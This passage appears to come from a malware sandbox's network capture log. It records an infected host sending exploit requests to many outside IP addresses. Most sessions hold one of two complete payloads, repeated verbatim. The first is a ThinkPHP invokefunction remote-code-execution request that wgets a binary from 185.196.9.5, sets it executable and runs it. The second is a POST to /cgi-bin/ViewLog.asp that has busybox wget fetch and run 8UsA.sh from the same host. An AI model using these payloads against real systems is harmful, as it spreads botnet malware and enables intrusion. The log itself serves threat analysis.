32 34 20 31 38 3a 30 32 3a 33 37 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 39 2e 31 34 39 2e 31 38 2e 32 30 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 58 55 5a 2d 30 31 54 61 6e 35 32 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 62 69 6e 73 2f Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Sun, 25 Feb 2024 18:02:37 GMT<br><span class="F">IP: 89.149.18.20</span>Node information: PS-XUZ-01Tan52<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/
Feb 25, 2024 19:02:37.821669102 CET	456	IN	Data Raw: 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 Data Ascii: requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">fu
Feb 25, 2024 19:02:37.821707010 CET	1286	IN	Data Raw: 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09 09 Data Ascii: x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'<br>Request-Id: 65db80bd_PS-XUZ-01Tan52_27777-23162<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class=
Feb 25, 2024 19:02:37.930939913 CET	456	IN	Data Raw: 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 Data Ascii: requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">fu
Feb 25, 2024 19:02:38.135034084 CET	456	IN	Data Raw: 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 Data Ascii: requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">fu

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.15	54950	88.83.97.137	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:37.901074886 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:38.082017899 CET	238	IN	HTTP/1.1 404 Not Found Content-Length: 0 Date: Sun, 25 Feb 2024 18:02:39 GMT X-Frame-Options: sameorigin Content-Security-Policy: frame-ancestors 'self' X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.15	54642	62.216.179.254	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:38.799972057 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:38.980912924 CET	484	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:08 GMT Server: Apache/2.2.16 (Debian) Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 243 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 55 4f 4d 4b c3 40 10 bd e7 57 8c 3d e9 c1 9d 24 d8 d2 c2 b2 60 9b 88 85 6a 83 c6 43 8f 9b ee 40 02 31 1b 67 37 8a ff de dd 86 1e bc 3c 98 79 5f 33 f2 a6 38 ee ea 53 55 c2 73 fd 72 80 ea 63 7b d8 ef 60 71 8f b8 2f eb 27 c4 a2 2e 66 26 17 29 62 f9 ba 50 89 6c fd 67 af 64 4b da 84 c1 77 be 27 f5 90 a6 b0 d5 06 de e8 6b 22 e7 25 ce eb 44 e2 45 26 1b 6b 7e a3 33 53 ff 54 61 4e e4 a8 4e 76 62 68 d8 fe 38 62 70 34 78 d0 c0 b3 06 7c ab 23 74 2e 10 fc 1d f8 b3 9d 7a 03 83 f5 30 0d 86 d8 79 3d 18 21 1b 06 8c 75 63 6c e1 00 da 18 26 e7 d4 e3 a8 cf 2d 61 2e 72 91 ad e0 b6 a0 a6 d3 c3 1d bc cf 61 21 3b 5b 2f 45 b6 59 89 8d 58 42 65 d9 c3 3a 95 78 75 87 c4 cb e9 e1 d4 f8 74 f2 07 ad c5 55 0a 2f 01 00 00 Data Ascii: UOMK@W=$`jC@1g7<y_38SUsrc{`q/'.f&)bPlgdKw'k"%DE&k~3STaNNvbh8bp4x\|#t.z0y=!ucl&-a.ra!;[/EYXBe:xutU/

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.15	38768	94.120.103.134	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:38.842544079 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.15	48282	95.86.77.70	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:38.852921009 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.15	48438	62.29.115.244	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:38.854906082 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.15	41336	62.176.105.90	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:39.063101053 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:39.288228035 CET	163	IN	HTTP/1.1 200 OK Date: Sun, 25 Feb 2024 18:02:39 GMT Connection: Keep-Alive Content-Type: text/html CACHE-CONTROL: no-cache Content-Length: 650

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.15	46484	94.122.104.64	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:39.066670895 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.15	49254	94.121.146.137	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:39.076984882 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.15	54920	88.208.215.191	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:40.985313892 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:41.163892031 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sun, 25 Feb 2024 18:02:41 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.15	58836	88.99.227.153	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:40.988684893 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:41.171267986 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:02:41 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.15	45688	88.30.7.140	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:41.013982058 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:41.221518993 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:02:41 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.15	34730	88.216.129.249	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:41.077358007 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:41.169266939 CET	501	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:45 GMT Server: Apache/2.4.54 (Debian) Content-Length: 307 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 34 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 30 37 2e 31 36 35 2e 31 39 36 2e 31 33 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.54 (Debian) Server at 107.165.196.135 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.15	38480	88.221.214.188	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:42.364341021 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:42.616292000 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:02:42 GMT Date: Sun, 25 Feb 2024 18:02:42 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 63 64 36 64 64 35 38 26 23 34 36 3b 31 37 30 38 38 38 34 31 36 32 26 23 34 36 3b 33 37 65 65 30 34 61 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.bcd6dd58.1708884162.37ee04a3</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.15	38500	88.221.214.188	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:42.444967031 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:42.654275894 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:02:42 GMT Date: Sun, 25 Feb 2024 18:02:42 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 63 64 36 64 64 35 38 26 23 34 36 3b 31 37 30 38 38 38 34 31 36 32 26 23 34 36 3b 33 37 65 65 30 34 61 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.bcd6dd58.1708884162.37ee04aa</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.15	37662	85.144.9.31	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:42.540069103 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:45.734410048 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:45.918468952 CET	376	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Jan 1970 11:20:00 GMT Server: DNVRS-Webs Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.15	34530	94.34.128.45	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:42.540122032 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
